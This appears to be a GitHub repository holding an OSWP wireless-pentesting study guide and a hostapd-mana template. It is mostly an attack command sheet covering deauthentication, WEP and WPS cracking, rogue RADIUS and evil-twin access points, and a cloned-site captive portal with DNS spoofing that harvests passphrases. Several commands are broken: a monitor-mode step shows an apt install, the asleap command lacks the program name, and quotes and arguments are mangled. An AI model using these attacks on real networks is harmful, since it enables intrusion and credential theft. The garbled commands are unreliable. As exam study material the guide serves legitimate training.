├── LICENSE ├── README.md └── hostapd-mana.conf /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 FullSteeI 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OSWP-Study-Guide 2 | Study guide and command sheet for Offensive Security PEN-210 course (Offensive Security Wireless Pentester - OSWP) 3 | 4 | ## Dependencies 5 | In order to run the following commands, install these frameworks first: 6 | ```bash 7 | sudo apt install airmon-ng reaver hashcat hostapd dnsmasq nftables apache2 libapache2-mod-php freeradius 8 | ``` 9 | 10 | ## Open Network with MAC filtering 11 | In the event that fake authentication persistently fails, it is plausible that MAC address filtering is being employed. Under such a scheme, the Access Point (AP) will only permit connections from a predefined list of MAC addresses. Should this be the scenario, it will be necessary to acquire a legitimate MAC address by monitoring network traffic with the aid of Airodump-ng. Subsequently, impersonation of this MAC address should be carried out once the corresponding client has disconnected from the network. It is imperative to refrain from initiating a fake authentication attack targeting a specific MAC address if the client remains active on the AP. 12 | 13 | ### Packet capture 14 | ```bash 15 | airodump-ng -w -c --bssid 16 | ``` 17 | ### Get your MAC address 18 | ```bash 19 | macchanger --show 20 | ``` 21 | 22 | ### Fake authentication attack 23 | ```bash 24 | aireplay-ng -1 0 -e -a -h 25 | ``` 26 | 27 | ### ARP replay attack 28 | ```bash 29 | aireplay-ng -3 -b -h 30 | ``` 31 | 32 | ### Deauthentication attack 33 | ```bash 34 | aireplay-ng -0 1 -a -c 35 | ``` 36 | 37 | ### Crack 38 | ```bash 39 | aircrack-ng 40 | ``` 41 | 42 | ## WEP (Wired Equivalent Privacy) 43 | WEP is a severely flawed security algorithm for IEEE 802.11 wireless networks. Below are the steps to exploit WEP vulnerabilities: 44 | 45 | 46 | ### Step 1: Kill conflicting processes 47 | ```bash 48 | sudo airmon-ng check kill 49 | ``` 50 | ### Step 2: Start monitor mode on wlan0 51 | ```bash 52 | sudo airmon-ng start wlan0 53 | ``` 54 | ### Step 3: Scan for WEP networks 55 | ```bash 56 | sudo airodump-ng wlan0mon --encrypt WEP 57 | ``` 58 | ### Step 4: Capture IVs 59 | ```bash 60 | besside-ng -c Channel -b BSSID wlan0mon 61 | ``` 62 | ### Step 5: Crack WEP key 63 | ```bash 64 | aircrack-ng ./wep.cap 65 | ``` 66 | 67 | ### Additional WEP Attacks: 68 | - [Hirte Attack](https://pentestlab.blog/2015/02/03/hirte-attack/) 69 | - [Caffe Latte Attck](https://www.computerworld.com/article/2539400/cafe-latte-attack-steals-data-from-wi-fi-users.html) 70 | 71 | ## WPS (Wi-Fi Protected Setup) 72 | WPS was originally known as Wi-Fi Simple Configuration, aiming to unify vendor technologies for secure WPA/WPA2 passphrase sharing. However, it has its set of vulnerabilities. Below are the steps to identify and exploit WPS vulnerabilities: 73 | 74 | ### Identifying access points with WPS enabled 75 | ```bash 76 | wash -i -s 77 | ``` 78 | ### Fake authentication attack 79 | ```bash 80 | aireplay-ng -1 0 -e -a -h 81 | ``` 82 | ### Offline brute force (pixie dust) 83 | ```bash 84 | reaver -i wlan0 -b BSSID -SNLAvv -c 1 -K 85 | ``` 86 | ### Online brute force 87 | ```bash 88 | reaver -i -b -SNLAsvv -d 1 -r 5:3 -c 89 | ``` 90 | 91 | ## WPA/WPA2/WPA3 Testing 92 | Steps for testing security on networks with WPA/WPA2/WPA3 encryption, including setting up rogue APs and capturing handshakes: 93 | 94 | ## WPA2 Enterprise 95 | Follow these steps to set up wireless monitoring and perform the attack. 96 | 97 | ### Step 1: Activate monitoring mode 98 | 99 | ```bash 100 | airmon-ng check kill && airmon-ng start 101 | ``` 102 | 103 | ### Step 2: Check AUTH column 104 | 105 | ```bash 106 | airodump-ng 107 | ``` 108 | *Note: The AUTH column will say MGT.* 109 | 110 | ### Step 3: Capture the handshake 111 | 112 | ```bash 113 | sudo airodump-ng -c channel -w ESSID interface 114 | ``` 115 | 116 | ### Step 4: Deauthenticate the client to capture the handshake 117 | 118 | ```bash 119 | aireplay-ng -0 0 -a ESSID -c client_ESSID interface 120 | ``` 121 | 122 | ### Step 5: Analyze with Wireshark or tshark 123 | 124 | After gathering the BSSID, ESSID, and channel: 125 | 126 | - Use Wireshark or tshark with filters: 127 | ```bash 128 | wlan.bssid==E8:9C:12:02:66:AA && eap && tls.handshake.certificate 129 | ``` 130 | or 131 | ```bash 132 | tls.handshake.type == 11,3 133 | ``` 134 | 135 | ### Step 6: Save certificates using OpenSSL 136 | 137 | View the Packet Details in TLSv1 Record Layer >> Handshake Protocol >> Certificate: 138 | 139 | ```bash 140 | openssl x509 -inform der -in cert.der -text 141 | ``` 142 | 143 | *Details needed for the attack include: Issuer information.* 144 | 145 | ### Step 6.5 (Optional): Convert the certificate to PEM format 146 | 147 | ```bash 148 | openssl x509 -inform der -in cert.der -outform pem -out output.crt 149 | ``` 150 | 151 | ### Step 7: Set up FreeRADIUS server 152 | 153 | Install with: 154 | 155 | ```bash 156 | sudo apt install freeradius 157 | ``` 158 | 159 | Edit the `ca.cnf` and `server.cnf` files to have less suspicious certificate authority fields. 160 | 161 | ```bash 162 | sudo mousepad /etc/freeradius/3.0/certs/ca.cnf 163 | sudo mousepad /etc/freeradius/3.0/certs/server.cnf 164 | ``` 165 | 166 | Update the respective sections with the correct information. 167 | 168 | ### Step 8: Prepare the certificates 169 | 170 | Navigate to `/etc/freeradius/3.0/certs/` and run: 171 | 172 | ```bash 173 | sudo rm dh && make 174 | ``` 175 | 176 | *Note: Ignore the error from FreeRADIUS if it expects other configurations.* 177 | 178 | ### Step 9: Configure hostapd-mana 179 | 180 | Edit `/etc/hostapd-mana/mana.conf` with the correct SSID, Certificate paths, and EAP file. 181 | 182 | ### Step 10: Set up `mana.eap_user` 183 | 184 | Configure `/etc/hostapd-mana/mana.eap_user` with the desired protocols and authentication methods. 185 | 186 | ### Step 11: Start hostapd-mana 187 | 188 | ```bash 189 | hostapd-mana /etc/hostapd-mana/mana.conf 190 | ``` 191 | 192 | ### Step 12: Use asleap to find a user 193 | 194 | Run asleap with the correct command to find a user with a successful login. 195 | 196 | ```bash 197 | -W /usr/share/john/password.lst 198 | ``` 199 | 200 | ### Step 13: Create `wpa_supplicant.conf` file 201 | 202 | Add the network configuration details: 203 | 204 | ```bash 205 | network={ 206 | ssid="NetworkName" 207 | scan_ssid=1 208 | key_mgmt=WPA-EAP 209 | identity="Domain\\username" 210 | password="password" 211 | eap=PEAP 212 | phase1="peaplabel=0" 213 | phase2="auth=MSCHAPV2" 214 | } 215 | ``` 216 | 217 | ### Step 14: Connect to the network 218 | 219 | Use `wpa_supplicant` to connect: 220 | 221 | ```bash 222 | wpa_supplicant -c 223 | ``` 224 | 225 | 226 | ## Rogue Access Points 227 | Instructions for creating a rogue AP. 228 | 229 | ### Discovery 230 | ```bash 231 | sudo airodump-ng -w capturename –output-format pcap wlan0mon 232 | ``` 233 | **Wireshark Filters:** 234 | ```bash 235 | wlan.fc.type_subtype == 0x08 #Broadcast Frames 236 | wlan.ssid == “apname” #AP name 237 | ``` 238 | Filters can be appended to filter for broadcast frames from a specific AP: 239 | ```bash 240 | wlan.fc.type_subtype == 0x08 && wlan.ssid == “apname” 241 | ``` 242 | The interesting parts are in Tag: Vendor Specific: & Tag: RSN: Information 243 | 244 | ### Creating a Rogue AP 245 | Hostapd-mana template location: 246 | ```bash 247 | /etc/hostapd-mana/hostapd-mana.conf 248 | ``` 249 | Or you may download the hostapd-mana.config in this repository and modify to your needs. 250 | 251 | Start hostapd-mana: 252 | ```bash 253 | sudo hostapd-mana hostapd-mana.conf 254 | ``` 255 | 256 | ### Cracking .hccapx Files 257 | **aircrack:** 258 | ```bash 259 | aircrack-ng name.hccapx -w /wordlist/rockyou.txt 260 | ``` 261 | If you run into errors, you may try: 262 | ```bash 263 | aircrack-ng name.hccapx -e ESSID -w /wordlist/rockyou.txt 264 | ``` 265 | **hashcat:** 266 | ``` 267 | hashcat -m 2500 capture.hccapx /usr/share/worlists/rockyou.txt 268 | ``` 269 | 270 | ## Attacking Captive Portals 271 | 272 | This guide provides step-by-step instructions for setting up a wireless network monitoring and attack environment. 273 | 274 | ### 1. Set Interface to Monitor Mode 275 | 276 | Begin by capturing information about clients and access points (APs) around you: 277 | 278 | ```bash 279 | sudo airodump-ng wlan0mon 280 | ``` 281 | 282 | ### 2. Adjust the Capture 283 | 284 | To specify the capture details, use: 285 | 286 | ```bash 287 | sudo airodump-ng -w fileName –output-format pcap -c channelnumber interface 288 | ``` 289 | 290 | ### 3. De-authenticate Connected Devices 291 | 292 | Wait until the WPA handshake is captured: 293 | 294 | ```bash 295 | sudo aireplay-ng -0 amountOfdeauths -a ApBSSID interface 296 | ``` 297 | 298 | ### 4. Disable Monitor Mode 299 | 300 | After completing the capture, disable monitor mode: 301 | 302 | ```bash 303 | sudo apt install apache2 libapache2-mod-php 304 | ``` 305 | 306 | ### 5. Download the Example Page 307 | 308 | Use `wget` to download the webpage. Here, `-l2` means to go 2 levels deep: 309 | 310 | ```bash 311 | wget -r -l2 https://www.website.com 312 | ``` 313 | 314 | ### 6. Prepare the Web Directory 315 | 316 | Create a directory for the phishing webpage: 317 | 318 | ```bash 319 | sudo mkdir /var/www/html/portal && sudo mousepad /var/www/html/portal/index.php 320 | ``` 321 | 322 | ### 7. Replicate the Website's Style 323 | 324 | Replicate the styling of the example website page and copy the assets: 325 | 326 | ```bash 327 | sudo cp -r ./www.website.com/assets /var/www/html/portal 328 | ``` 329 | 330 | ### 8. Set Up the Login Page 331 | 332 | Configure the login page to redirect to `login_check.php`: 333 | 334 | ```bash 335 | sudo mousepad /var/www/html/portal/login_check.php 336 | ``` 337 | 338 | ### 9. Assign an IP address and activate the interface: 339 | 340 | ```bash 341 | sudo ip addr add 192.168.87.1/24 dev wlan0 342 | sudo ip link set wlan0 up 343 | ``` 344 | 345 | ### 10. Ensure dnsmasq is installed: 346 | 347 | ```bash 348 | sudo apt install dnsmasq 349 | ``` 350 | 351 | ### 11. Create the DHCP config file at `/home/kali/dnsmasq.conf` and add spoofing entries for top-level domains: 352 | 353 | ```bash 354 | address=/com/192.168.0.1 355 | address=/org/192.168.0.1 356 | address=/net/192.168.0.1 357 | ``` 358 | 359 | ### 12. For Windows 7 & 10 captive portal detection, add: 360 | 361 | ```bash 362 | address=/dns.msftncsicom/131.107.255.255 363 | ``` 364 | 365 | ### 13. Start dnsmasq with the config file: 366 | 367 | ```bash 368 | sudo dnsmasq –conf-file=dnsmasq.com 369 | ``` 370 | 371 | ### 14. Verify if dnsmasq is running successfully: 372 | 373 | ```bash 374 | sudo tail /var/log/syslog | grep dnsmasq 375 | ``` 376 | 377 | ### 15. Install nftables: 378 | 379 | ```bash 380 | sudo apt install nftables 381 | ``` 382 | 383 | ### 16. Add required rules: 384 | 385 | ```bash 386 | sudo nft add table ip nat 387 | sudo nft ‘add chain ip nat PREROUTING { type nat hook prerouting priority dstnat; policy; accept; }’ 388 | sudo nft add rule ip nat PREROUTING iifname “wlan0” udp dport 53 counter redirect to :53 389 | ``` 390 | 391 | ### 17. Modify Apache configuration: 392 | 393 | ```bash 394 | sudo mousepad /etc/apache2/sites-enabled/000-default.conf 395 | ``` 396 | 397 | ### 18. Enable necessary modules and restart Apache: 398 | 399 | ```bash 400 | sudo a2enmod rewrite && sudo a2enmod alias 401 | sudo systemctl restart apache2 402 | ``` 403 | 404 | ### 19. Check the portal by navigating to: 405 | 406 | ```bash 407 | Firefox 127.0.0.1/portal/index.php 408 | ``` 409 | 410 | ### 20. Install hostapd and edit the configuration: 411 | 412 | ```bash 413 | sudo apt install hostapd && mousepad hostapd.conf 414 | ``` 415 | 416 | ### 21. Create and run a 802.11n AP: 417 | 418 | ```bash 419 | sudo hostapd -B hostapd.conf 420 | ``` 421 | 422 | ### 22. Monitor the logs in two separate terminals: 423 | 424 | - Terminal 1: 425 | 426 | ```bash 427 | sudo tail -f /var/log/syslog | grep -E ‘(dnsmasq|hostapd)’ 428 | ``` 429 | 430 | - Terminal 2: 431 | 432 | ```bash 433 | sudo tail -f /var/log/apache2/access.log 434 | ``` 435 | 436 | ### 23. Search for passphrase files in `/tmp/`: 437 | 438 | ```bash 439 | sudo find /tmp/ -iname passphrase.txt 440 | ``` 441 | 442 | ### 24. Read the contents of the passphrase file: 443 | 444 | ```bash 445 | sudo cat /tmp/systemd-private-b37…aef-apache2.service-b...i/tmp/passphrase.txt 446 | ``` 447 | 448 | 449 | ## Information Discovery Example 450 | ```bash 451 | - ESSID of JesusIsTheWay 452 | - BSSID of 34:5a:90:e0:5a:30 453 | - WPS (AES/CCM) 454 | - Uses a PSK 455 | - Runs on channel 1 456 | ``` 457 | 458 | ## Definitions 459 | - AP: Access Point 460 | - BSSID: Basic Service Set Identifier is a 48-bit number that follows MAC address conventions. 461 | - ESSID: Extended Service Set Identifier is a unique identifier to avoid interference on a wireless network. 462 | 463 | ## Troubleshooting 464 | - Make sure that hostapd-mana is installed on Kali. Default installations currently feature hostapd, hostapd-wpa and hostapd_cli. None of these frameworks feature the *mana_wpaout* section in the *hostapd-mana.config*, and will result in error: *unknown configuration item 'mana_wpaout'* 465 | - When starting the exam, fist thing after connecting to the .ovpn is to test both **SSH** and **RDP** protocols to ensure connection works as intended. 466 | - In order to list wireless interfaces, execute command: 467 | ```bash 468 | sudo airmon-ng 469 | ``` 470 | - To restart Network Manager, execute command: 471 | ```bash 472 | systemctl restart NetworkManager.service 473 | ``` 474 | 475 | ## Sources 476 | - [LIODEUS OSWP Cheatsheet](https://liodeus.github.io/2020/10/29/OSWP-personal-cheatsheet.html) 477 | - [Hashcat File Formats](https://hashcat.net/wiki/doku.php?id=example_hashes) 478 | - [Hashcat Cracking WPA/WPA2](https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2) 479 | 480 | ## Disclaimer and Legal Notice 481 | 482 | ### Ethical Considerations and Legal Compliance 483 | The techniques, commands, and procedures outlined in this guide are intended solely for educational purposes and preparing for the Offensive Security PEN-210 course (Offensive Security Wireless Pentester - OSWP). These techniques involve methodologies that, if misused, may constitute illegal activities. Users are strongly cautioned against engaging in any unauthorized and/or unlawful actions. 484 | 485 | ### Scope of Use 486 | - **Authorized Environments Only**: The execution of penetration testing, network attacks, and other tactics described herein should only be performed on networks and systems that are explicitly owned or authorized for testing by the user. This includes personal hardware, controlled environments, or environments for which explicit, documented permission has been granted. 487 | - **No Unauthorized Use**: Under no circumstances should these techniques be applied to networks, systems, or devices without explicit authorization. Unauthorized use of these techniques may lead to legal consequences and is strongly condemned. 488 | 489 | ### Exam Conduct 490 | - **Adherence to Exam Guidelines**: While this guide serves as preparation material for the OSWP exam, users must strictly adhere to the guidelines, rules, and ethical standards set forth by Offensive Security during the examination. 491 | - **Prohibited Actions**: Any attempt to use these techniques outside of the specified exam environment, or in a manner not aligned with the exam's rules, may result in disqualification, legal action, and other serious consequences. 492 | 493 | ### Liability 494 | - **No Responsibility for Misuse**: The authors, contributors, and associated entities of this guide accept no responsibility or liability for any misuse, damage, or illegal activities arising from the information presented. Users are solely responsible for their actions. 495 | - **Acknowledgment of Risk**: Users acknowledge the risks involved in security testing and penetration testing and agree to ensure ethical and legal use of this information. 496 | 497 | ### Continuous Learning and Ethical Growth 498 | - **Commitment to Ethical Hacking**: Users are encouraged to pursue knowledge in cybersecurity and ethical hacking with a strong commitment to legal compliance, ethical behavior, and respect for privacy and data protection. 499 | 500 | By using the information in this guide, you acknowledge having read, understood, and agreed to this disclaimer and all its terms. Your use of this information indicates your acceptance of the risks and your commitment to using this knowledge responsibly and ethically. 501 | -------------------------------------------------------------------------------- /hostapd-mana.conf: -------------------------------------------------------------------------------- 1 | # Template Config File for hostapd-mana command: 2 | interface=wlan0 3 | ssid=apname 4 | channel=1 5 | ieee80211n=1 6 | hw_mode=g # if 5ghz, set to a 7 | wpa=3 # 1 only enables WPA, 2 is WPA2 8 | wpa_key_mgmt=WPA-PSK 9 | wpa_passphrase=ANYPASSWORD # actual value irrelevant, as we are trying to capture handshake, has to be between 8 - 63 characters 10 | wpa_pairwise=TKIP CCMP # WPA only 11 | rsn_pairwise =TKIP CCMP # WPA2 only, since using option 3, we enable both 12 | mana_wpaout=/home/kali/name.hccapx # specifies where to save handshakes, each handshake is appended to the file, can be decrypted with hashcat -m 2500 or aircrack-ng 13 | # if mana_wpaout is producing error: unknown configuration item 'mana_wpaout' make sure you are using command hostapd-mana and not hostapd command 14 | --------------------------------------------------------------------------------